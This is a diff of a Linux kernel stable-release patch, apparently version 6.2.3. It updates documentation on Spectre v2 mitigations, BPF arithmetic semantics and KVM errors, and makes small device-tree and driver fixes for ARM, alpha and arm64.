+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index c4dcdb3d0d451..a39bbfe9526b6 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -479,8 +479,16 @@ Spectre variant 2
+    On Intel Skylake-era systems the mitigation covers most, but not all,
+    cases. See :ref:`[3] <spec_ref3>` for more details.
+ 
+-   On CPUs with hardware mitigation for Spectre variant 2 (e.g. Enhanced
+-   IBRS on x86), retpoline is automatically disabled at run time.
++   On CPUs with hardware mitigation for Spectre variant 2 (e.g. IBRS
++   or enhanced IBRS on x86), retpoline is automatically disabled at run time.
++
++   Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
++   boot, by setting the IBRS bit, and they're automatically protected against
++   Spectre v2 variant attacks, including cross-thread branch target injections
++   on SMT systems (STIBP). In other words, eIBRS enables STIBP too.
++
++   Legacy IBRS systems clear the IBRS bit on exit to userspace and
++   therefore explicitly enable STIBP for that
+ 
+    The retpoline mitigation is turned on by default on vulnerable
+    CPUs. It can be forced on or off by the administrator
+@@ -504,9 +512,12 @@ Spectre variant 2
+    For Spectre variant 2 mitigation, individual user programs
+    can be compiled with return trampolines for indirect branches.
+    This protects them from consuming poisoned entries in the branch
+-   target buffer left by malicious software.  Alternatively, the
+-   programs can disable their indirect branch speculation via prctl()
+-   (See :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
++   target buffer left by malicious software.
++
++   On legacy IBRS systems, at return to userspace, implicit STIBP is disabled
++   because the kernel clears the IBRS bit. In this case, the userspace programs
++   can disable indirect branch speculation via prctl() (See
++   :ref:`Documentation/userspace-api/spec_ctrl.rst <set_spec_ctrl>`).
+    On x86, this will turn on STIBP to guard against attacks from the
+    sibling thread when the user program is running, and use IBPB to
+    flush the branch target buffer when switching to/from the program.
+diff --git a/Documentation/admin-guide/kdump/gdbmacros.txt b/Documentation/admin-guide/kdump/gdbmacros.txt
+index 82aecdcae8a6c..030de95e3e6b2 100644
+--- a/Documentation/admin-guide/kdump/gdbmacros.txt
++++ b/Documentation/admin-guide/kdump/gdbmacros.txt
+@@ -312,10 +312,10 @@ define dmesg
+ 			set var $prev_flags = $info->flags
+ 		end
+ 
+-		set var $id = ($id + 1) & $id_mask
+ 		if ($id == $end_id)
+ 			loop_break
+ 		end
++		set var $id = ($id + 1) & $id_mask
+ 	end
+ end
+ document dmesg
+diff --git a/Documentation/bpf/instruction-set.rst b/Documentation/bpf/instruction-set.rst
+index e672d5ec6cc7b..2d3fe59bd260f 100644
+--- a/Documentation/bpf/instruction-set.rst
++++ b/Documentation/bpf/instruction-set.rst
+@@ -99,19 +99,26 @@ code      value  description
+ BPF_ADD   0x00   dst += src
+ BPF_SUB   0x10   dst -= src
+ BPF_MUL   0x20   dst \*= src
+-BPF_DIV   0x30   dst /= src
++BPF_DIV   0x30   dst = (src != 0) ? (dst / src) : 0
+ BPF_OR    0x40   dst \|= src
+ BPF_AND   0x50   dst &= src
+ BPF_LSH   0x60   dst <<= src
+ BPF_RSH   0x70   dst >>= src
+ BPF_NEG   0x80   dst = ~src
+-BPF_MOD   0x90   dst %= src
++BPF_MOD   0x90   dst = (src != 0) ? (dst % src) : dst
+ BPF_XOR   0xa0   dst ^= src
+ BPF_MOV   0xb0   dst = src
+ BPF_ARSH  0xc0   sign extending shift right
+ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ ========  =====  ==========================================================
+ 
++Underflow and overflow are allowed during arithmetic operations, meaning
++the 64-bit or 32-bit value will wrap. If eBPF program execution would
++result in division by zero, the destination register is instead set to zero.
++If execution would result in modulo by zero, for ``BPF_ALU64`` the value of
++the destination register is unchanged whereas for ``BPF_ALU`` the upper
++32 bits of the destination register are zeroed.
++
+ ``BPF_ADD | BPF_X | BPF_ALU`` means::
+ 
+   dst_reg = (u32) dst_reg + (u32) src_reg;
+@@ -128,6 +135,11 @@ BPF_END   0xd0   byte swap operations (see `Byte swap instructions`_ below)
+ 
+   dst_reg = dst_reg ^ imm32
+ 
++Also note that the division and modulo operations are unsigned. Thus, for
++``BPF_ALU``, 'imm' is first interpreted as an unsigned 32-bit value, whereas
++for ``BPF_ALU64``, 'imm' is first sign extended to 64 bits and the result
++interpreted as an unsigned 64-bit value. There are no instructions for
++signed division or modulo.
+ 
+ Byte swap instructions
+ ~~~~~~~~~~~~~~~~~~~~~~
+diff --git a/Documentation/dev-tools/gdb-kernel-debugging.rst b/Documentation/dev-tools/gdb-kernel-debugging.rst
+index 8e0f1fe8d17ad..895285c037c72 100644
+--- a/Documentation/dev-tools/gdb-kernel-debugging.rst
++++ b/Documentation/dev-tools/gdb-kernel-debugging.rst
+@@ -39,6 +39,10 @@ Setup
+   this mode. In this case, you should build the kernel with
+   CONFIG_RANDOMIZE_BASE disabled if the architecture supports KASLR.
+ 
++- Build the gdb scripts (required on kernels v5.1 and above)::
++
++    make scripts_gdb
++
+ - Enable the gdb stub of QEMU/KVM, either
+ 
+     - at VM startup time by appending "-s" to the QEMU command line
+diff --git a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+index 63fb02014a56a..117e3db43f84a 100644
+--- a/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
++++ b/Documentation/devicetree/bindings/display/mediatek/mediatek,ccorr.yaml
+@@ -32,7 +32,7 @@ properties:
+       - items:
+           - enum:
+               - mediatek,mt8186-disp-ccorr
+-          - const: mediatek,mt8183-disp-ccorr
++          - const: mediatek,mt8192-disp-ccorr
+ 
+   reg:
+     maxItems: 1
+diff --git a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+index 5b8d59245f82f..b358fd601ed38 100644
+--- a/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
++++ b/Documentation/devicetree/bindings/sound/amlogic,gx-sound-card.yaml
+@@ -62,7 +62,7 @@ patternProperties:
+         description: phandle of the CPU DAI
+ 
+     patternProperties:
+-      "^codec-[0-9]+$":
++      "^codec(-[0-9]+)?$":
+         type: object
+         additionalProperties: false
+         description: |-
+diff --git a/Documentation/hwmon/ftsteutates.rst b/Documentation/hwmon/ftsteutates.rst
+index 58a2483d8d0da..198fa8e2819da 100644
+--- a/Documentation/hwmon/ftsteutates.rst
++++ b/Documentation/hwmon/ftsteutates.rst
+@@ -22,6 +22,10 @@ enhancements. It can monitor up to 4 voltages, 16 temperatures and
+ 8 fans. It also contains an integrated watchdog which is currently
+ implemented in this driver.
+ 
++The 4 voltages require a board-specific multiplier, since the BMC can
++only measure voltages up to 3.3V and thus relies on voltage dividers.
++Consult your motherboard manual for details.
++
+ To clear a temperature or fan alarm, execute the following command with the
+ correct path to the alarm file::
+ 
+diff --git a/Documentation/virt/kvm/api.rst b/Documentation/virt/kvm/api.rst
+index 0a67cb738013e..dc89d4e9d23e6 100644
+--- a/Documentation/virt/kvm/api.rst
++++ b/Documentation/virt/kvm/api.rst
+@@ -4457,6 +4457,18 @@ not holding a previously reported uncorrected error).
+ :Parameters: struct kvm_s390_cmma_log (in, out)
+ :Returns: 0 on success, a negative value on error
+ 
++Errors:
++
++  ======     =============================================================
++  ENOMEM     not enough memory can be allocated to complete the task
++  ENXIO      if CMMA is not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but migration mode was not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but dirty tracking has been
++             disabled (and thus migration mode was automatically disabled)
++  EFAULT     if the userspace address is invalid or if no page table is
++             present for the addresses (e.g. when using hugepages).
++  ======     =============================================================
++
+ This ioctl is used to get the values of the CMMA bits on the s390
+ architecture. It is meant to be used in two scenarios:
+ 
+@@ -4537,12 +4549,6 @@ mask is unused.
+ 
+ values points to the userspace buffer where the result will be stored.
+ 
+-This ioctl can fail with -ENOMEM if not enough memory can be allocated to
+-complete the task, with -ENXIO if CMMA is not enabled, with -EINVAL if
+-KVM_S390_CMMA_PEEK is not set but migration mode was not enabled, with
+--EFAULT if the userspace address is invalid or if no page table is
+-present for the addresses (e.g. when using hugepages).
+-
+ 4.108 KVM_S390_SET_CMMA_BITS
+ ----------------------------
+ 
+diff --git a/Documentation/virt/kvm/devices/vm.rst b/Documentation/virt/kvm/devices/vm.rst
+index 60acc39e0e937..147efec626e52 100644
+--- a/Documentation/virt/kvm/devices/vm.rst
++++ b/Documentation/virt/kvm/devices/vm.rst
+@@ -302,6 +302,10 @@ Allows userspace to start migration mode, needed for PGSTE migration.
+ Setting this attribute when migration mode is already active will have
+ no effects.
+ 
++Dirty tracking must be enabled on all memslots, else -EINVAL is returned. When
++dirty tracking is disabled on any memslot, migration mode is automatically
++stopped.
++
+ :Parameters: none
+ :Returns:   -ENOMEM if there is not enough free memory to start migration mode;
+ 	    -EINVAL if the state of the VM is invalid (e.g. no memory defined);
+diff --git a/Makefile b/Makefile
+index 1836ddaf2c94c..eef164b4172a9 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 2
++SUBLEVEL = 3
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/alpha/boot/tools/objstrip.c b/arch/alpha/boot/tools/objstrip.c
+index 08b430d25a315..7cf92d172dce9 100644
+--- a/arch/alpha/boot/tools/objstrip.c
++++ b/arch/alpha/boot/tools/objstrip.c
+@@ -148,7 +148,7 @@ main (int argc, char *argv[])
+ #ifdef __ELF__
+     elf = (struct elfhdr *) buf;
+ 
+-    if (elf->e_ident[0] == 0x7f && str_has_prefix((char *)elf->e_ident + 1, "ELF")) {
++    if (memcmp(&elf->e_ident[EI_MAG0], ELFMAG, SELFMAG) == 0) {
+ 	if (elf->e_type != ET_EXEC) {
+ 	    fprintf(stderr, "%s: %s is not an ELF executable\n",
+ 		    prog_name, inname);
+diff --git a/arch/alpha/kernel/traps.c b/arch/alpha/kernel/traps.c
+index 8a66fe544c69b..d9a67b370e047 100644
+--- a/arch/alpha/kernel/traps.c
++++ b/arch/alpha/kernel/traps.c
+@@ -233,7 +233,21 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ {
+ 	int signo, code;
+ 
+-	if ((regs->ps & ~IPL_MAX) == 0) {
++	if (type == 3) { /* FEN fault */
++		/* Irritating users can call PAL_clrfen to disable the
++		   FPU for the process.  The kernel will then trap in
++		   do_switch_stack and undo_switch_stack when we try
++		   to save and restore the FP registers.
++
++		   Given that GCC by default generates code that uses the
++		   FP registers, PAL_clrfen is not useful except for DoS
++		   attacks.  So turn the bleeding FPU back on and be done
++		   with it.  */
++		current_thread_info()->pcb.flags |= 1;
++		__reload_thread(&current_thread_info()->pcb);
++		return;
++	}
++	if (!user_mode(regs)) {
+ 		if (type == 1) {
+ 			const unsigned int *data
+ 			  = (const unsigned int *) regs->pc;
+@@ -366,20 +380,6 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ 		}
+ 		break;
+ 
+-	      case 3: /* FEN fault */
+-		/* Irritating users can call PAL_clrfen to disable the
+-		   FPU for the process.  The kernel will then trap in
+-		   do_switch_stack and undo_switch_stack when we try
+-		   to save and restore the FP registers.
+-
+-		   Given that GCC by default generates code that uses the
+-		   FP registers, PAL_clrfen is not useful except for DoS
+-		   attacks.  So turn the bleeding FPU back on and be done
+-		   with it.  */
+-		current_thread_info()->pcb.flags |= 1;
+-		__reload_thread(&current_thread_info()->pcb);
+-		return;
+-
+ 	      case 5: /* illoc */
+ 	      default: /* unexpected instruction-fault type */
+ 		      ;
+diff --git a/arch/arm/boot/dts/exynos3250-rinato.dts b/arch/arm/boot/dts/exynos3250-rinato.dts
+index 6d2c7bb191842..2eb682009815a 100644
+--- a/arch/arm/boot/dts/exynos3250-rinato.dts
++++ b/arch/arm/boot/dts/exynos3250-rinato.dts
+@@ -250,7 +250,7 @@
+ 	i80-if-timings {
+ 		cs-setup = <0>;
+ 		wr-setup = <0>;
+-		wr-act = <1>;
++		wr-active = <1>;
+ 		wr-hold = <0>;
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+index 021d9fc1b4923..27a1a89526655 100644
+--- a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+@@ -10,7 +10,7 @@
+ / {
+ thermal-zones {
+ 	cpu_thermal: cpu-thermal {
+-		thermal-sensors = <&tmu 0>;
++		thermal-sensors = <&tmu>;
+ 		polling-delay-passive = <0>;
+ 		polling-delay = <0>;
+ 		trips {
+diff --git a/arch/arm/boot/dts/exynos4.dtsi b/arch/arm/boot/dts/exynos4.dtsi
+index 5c4ecda27a476..7ba7a18c25000 100644
+--- a/arch/arm/boot/dts/exynos4.dtsi
++++ b/arch/arm/boot/dts/exynos4.dtsi
+@@ -605,7 +605,7 @@
+ 			status = "disabled";
+ 
+ 			hdmi_i2c_phy: hdmiphy@38 {
+-				compatible = "exynos4210-hdmiphy";
++				compatible = "samsung,exynos4210-hdmiphy";
+ 				reg = <0x38>;
+ 			};
+ 		};
+diff --git a/arch/arm/boot/dts/exynos4210.dtsi b/arch/arm/boot/dts/exynos4210.dtsi
+index 2c25cc37934e8..f8c6c5d1906af 100644
+--- a/arch/arm/boot/dts/exynos4210.dtsi
++++ b/arch/arm/boot/dts/exynos4210.dtsi
+@@ -393,7 +393,6 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
+ };
+ 
+ &gic {
+diff --git a/arch/arm/boot/dts/exynos5250.dtsi b/arch/arm/boot/dts/exynos5250.dtsi
+index 4708dcd575a77..01751706ff96d 100644
+--- a/arch/arm/boot/dts/exynos5250.dtsi
++++ b/arch/arm/boot/dts/exynos5250.dtsi
+@@ -1107,7 +1107,7 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
++	thermal-sensors = <&tmu>;
+ 
+ 	cooling-maps {
+ 		map0 {
+diff --git a/arch/arm/boot/dts/exynos5410-odroidxu.dts b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+index d1cbc6b8a5703..e18110b93875a 100644
+--- a/arch/arm/boot/dts/exynos5410-odroidxu.dts
++++ b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+@@ -120,7 +120,6 @@
+ };
+ 
+ &cpu0_thermal {
+-	thermal-sensors = <&tmu_cpu0 0>;
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+ 
+diff --git a/arch/arm/boot/dts/exynos5420.dtsi b/arch/arm/boot/dts/exynos5420.dtsi
+index 9f2523a873d9d..62263eb91b3cc 100644
+--- a/arch/arm/boot/dts/exynos5420.dtsi
++++ b/arch/arm/boot/dts/exynos5420.dtsi
+@@ -592,7 +592,7 @@
+ 		};
+ 
+ 		mipi_phy: mipi-video-phy {
+-			compatible = "samsung,s5pv210-mipi-video-phy";
++			compatible = "samsung,exynos5420-mipi-video-phy";
+ 			syscon = <&pmu_system_controller>;
+ 			#phy-cells = <1>;
+ 		};
+diff --git a/arch/arm/boot/dts/exynos5422-odroidhc1.dts b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+index 3de7019572a20..5e42803937067 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidhc1.dts
++++ b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+@@ -31,7 +31,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			trips {
+ 				cpu0_alert0: cpu-alert-0 {
+ 					temperature = <70000>; /* millicelsius */
+@@ -86,7 +86,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			trips {
+ 				cpu1_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -130,7 +130,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			trips {
+ 				cpu2_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -174,7 +174,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			trips {
+ 				cpu3_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -218,7 +218,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			trips {
+ 				gpu_alert0: gpu-alert-0 {
+ 					temperature = <70000>;
+diff --git a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+index a6961ff240304..e6e7e2ff2a261 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
++++ b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+@@ -50,7 +50,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -139,7 +139,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -212,7 +212,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -285,7 +285,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -358,7 +358,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 0fc9e6b8b05dc..11b9321badc51 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -513,7 +513,7 @@
+ 
+ 				mux: mux-controller {
+ 					compatible = "mmio-mux";
+-					#mux-control-cells = <0>;
++					#mux-control-cells = <1>;
+ 					mux-reg-masks = <0x14 0x00000010>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index f1c0dab409922..93d71aff3fab7 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -578,7 +578,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx55-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx55-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x20000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/qcom-sdx65.dtsi b/arch/arm/boot/dts/qcom-sdx65.dtsi
+index b073e0c63df4f..408c4b87d44b0 100644
+--- a/arch/arm/boot/dts/qcom-sdx65.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx65.dtsi
+@@ -455,7 +455,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx65-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx65-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x40000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/stm32mp131.dtsi b/arch/arm/boot/dts/stm32mp131.dtsi
+index accc3824f7e98..99d88096959eb 100644
+--- a/arch/arm/boot/dts/stm32mp131.dtsi
++++ b/arch/arm/boot/dts/stm32mp131.dtsi
+@@ -527,6 +527,7 @@
+ 
+ 			part_number_otp: part_number_otp@4 {
+ 				reg = <0x4 0x2>;
++				bits = <0 12>;
+ 			};
+ 			ts_cal1: calib@5c {
+ 				reg = <0x5c 0x2>;
+diff --git a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+index 43641cb82398f..343b02b971555 100644
+--- a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
++++ b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+@@ -57,7 +57,7 @@
+ 		regulator-ramp-delay = <50>; /* 4ms */
+ 
+ 		enable-active-high;
+-		enable-gpio = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
++		enable-gpios = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
+ 		gpios = <&r_pio 0 6 GPIO_ACTIVE_HIGH>; /* PL6 */
+ 		gpios-states = <0x1>;
+ 		states = <1100000 0>, <1300000 1>;
+diff --git a/arch/arm/configs/bcm2835_defconfig b/arch/arm/configs/bcm2835_defconfig
+index a51babd178c26..be0c984a66947 100644
+--- a/arch/arm/configs/bcm2835_defconfig
++++ b/arch/arm/configs/bcm2835_defconfig
+@@ -107,6 +107,7 @@ CONFIG_MEDIA_CAMERA_SUPPORT=y
+ CONFIG_DRM=y
+ CONFIG_DRM_V3D=y
+ CONFIG_DRM_VC4=y
++CONFIG_FB=y
+ CONFIG_FB_SIMPLE=y
+ CONFIG_FRAMEBUFFER_CONSOLE=y
+ CONFIG_SOUND=y
+diff --git a/arch/arm/mach-imx/mmdc.c b/arch/arm/mach-imx/mmdc.c
+index af12668d0bf51..b9efe9da06e0b 100644
+--- a/arch/arm/mach-imx/mmdc.c
++++ b/arch/arm/mach-imx/mmdc.c
+@@ -99,6 +99,7 @@ struct mmdc_pmu {
+ 	cpumask_t cpu;
+ 	struct hrtimer hrtimer;
+ 	unsigned int active_events;
++	int id;
+ 	struct device *dev;
+ 	struct perf_event *mmdc_events[MMDC_NUM_COUNTERS];
+ 	struct hlist_node node;
+@@ -433,8 +434,6 @@ static enum hrtimer_restart mmdc_pmu_timer_handler(struct hrtimer *hrtimer)
+ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		void __iomem *mmdc_base, struct device *dev)
+ {
+-	int mmdc_num;
+-
+ 	*pmu_mmdc = (struct mmdc_pmu) {
+ 		.pmu = (struct pmu) {
+ 			.task_ctx_nr    = perf_invalid_context,
+@@ -452,15 +451,16 @@ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		.active_events = 0,
+ 	};
+ 
+-	mmdc_num = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
++	pmu_mmdc->id = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
+ 
+-	return mmdc_num;
++	return pmu_mmdc->id;
+ }
+ 
+ static int imx_mmdc_remove(struct platform_device *pdev)
+ {
+ 	struct mmdc_pmu *pmu_mmdc = platform_get_drvdata(pdev);
+ 
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	perf_pmu_unregister(&pmu_mmdc->pmu);
+ 	iounmap(pmu_mmdc->mmdc_base);
+@@ -474,7 +474,6 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ {
+ 	struct mmdc_pmu *pmu_mmdc;
+ 	char *name;
+-	int mmdc_num;
+ 	int ret;
+ 	const struct of_device_id *of_id =
+ 		of_match_device(imx_mmdc_dt_ids, &pdev->dev);
+@@ -497,14 +496,14 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 		cpuhp_mmdc_state = ret;
+ 	}
+ 
+-	mmdc_num = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
+-	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+-	if (mmdc_num == 0)
+-		name = "mmdc";
+-	else
+-		name = devm_kasprintf(&pdev->dev,
+-				GFP_KERNEL, "mmdc%d", mmdc_num);
++	ret = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
++	if (ret < 0)
++		goto  pmu_free;
+ 
++	name = devm_kasprintf(&pdev->dev,
++				GFP_KERNEL, "mmdc%d", ret);
++
++	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+ 	pmu_mmdc->devtype_data = (struct fsl_mmdc_devtype_data *)of_id->data;
+ 
+ 	hrtimer_init(&pmu_mmdc->hrtimer, CLOCK_MONOTONIC,
+@@ -525,6 +524,7 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ pmu_register_err:
+ 	pr_warn("MMDC Perf PMU failed (%d), disabled\n", ret);
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	hrtimer_cancel(&pmu_mmdc->hrtimer);
+ pmu_free:
+diff --git a/arch/arm/mach-omap1/timer.c b/arch/arm/mach-omap1/timer.c
+index f5cd4bbf7566d..81a912c1145a9 100644
+--- a/arch/arm/mach-omap1/timer.c
++++ b/arch/arm/mach-omap1/timer.c
+@@ -158,7 +158,7 @@ err_free_pdata:
+ 	kfree(pdata);
+ 
+ err_free_pdev:
+-	platform_device_unregister(pdev);
++	platform_device_put(pdev);
+ 
+ 	return ret;
+ }
+diff --git a/arch/arm/mach-omap2/omap4-common.c b/arch/arm/mach-omap2/omap4-common.c
+index 6d1eb4eefefe5..d9ed2a5dcd5ef 100644
+--- a/arch/arm/mach-omap2/omap4-common.c
++++ b/arch/arm/mach-omap2/omap4-common.c
+@@ -140,6 +140,7 @@ static int __init omap4_sram_init(void)
+ 			__func__);
+ 	else
+ 		sram_sync = (void __iomem *)gen_pool_alloc(sram_pool, PAGE_SIZE);
++	of_node_put(np);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm/mach-omap2/timer.c b/arch/arm/mach-omap2/timer.c
+index 620ba69c8f114..5677c4a08f376 100644
+--- a/arch/arm/mach-omap2/timer.c
++++ b/arch/arm/mach-omap2/timer.c
+@@ -76,6 +76,7 @@ static void __init realtime_counter_init(void)
+ 	}
+ 
+ 	rate = clk_get_rate(sys_clk);
++	clk_put(sys_clk);
+ 
+ 	if (soc_is_dra7xx()) {
+ 		/*
+diff --git a/arch/arm/mach-s3c/s3c64xx.c b/arch/arm/mach-s3c/s3c64xx.c
+index 0a8116c108fe4..dce2b0e953088 100644
+--- a/arch/arm/mach-s3c/s3c64xx.c
++++ b/arch/arm/mach-s3c/s3c64xx.c
+@@ -173,7 +173,8 @@ static struct samsung_pwm_variant s3c64xx_pwm_variant = {
+ 	.tclk_mask	= (1 << 7) | (1 << 6) | (1 << 5),
+ };
+ 
+-void __init s3c64xx_set_timer_source(unsigned int event, unsigned int source)
++void __init s3c64xx_set_timer_source(enum s3c64xx_timer_mode event,
++				     enum s3c64xx_timer_mode source)
+ {
+ 	s3c64xx_pwm_variant.output_mask = BIT(SAMSUNG_PWM_NUM) - 1;
+ 	s3c64xx_pwm_variant.output_mask &= ~(BIT(event) | BIT(source));
+diff --git a/arch/arm/mach-zynq/slcr.c b/arch/arm/mach-zynq/slcr.c
+index 37707614885a5..9765b3f4c2fc5 100644
+--- a/arch/arm/mach-zynq/slcr.c
++++ b/arch/arm/mach-zynq/slcr.c
+@@ -213,6 +213,7 @@ int __init zynq_early_slcr_init(void)
+ 	zynq_slcr_regmap = syscon_regmap_lookup_by_compatible("xlnx,zynq-slcr");
+ 	if (IS_ERR(zynq_slcr_regmap)) {
+ 		pr_err("%s: failed to find zynq-slcr\n", __func__);
++		of_node_put(np);
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index c5ccca26a4087..ddfd35c86bdac 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -100,7 +100,6 @@ config ARM64
+ 	select ARCH_WANT_DEFAULT_TOPDOWN_MMAP_LAYOUT
+ 	select ARCH_WANT_FRAME_POINTERS
+ 	select ARCH_WANT_HUGE_PMD_SHARE if ARM64_4K_PAGES || (ARM64_16K_PAGES && !ARM64_VA_BITS_36)
+-	select ARCH_WANT_HUGETLB_PAGE_OPTIMIZE_VMEMMAP
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+ 	select ARCH_WANTS_NO_INSTR
+ 	select ARCH_WANTS_THP_SWAP if ARM64_4K_PAGES
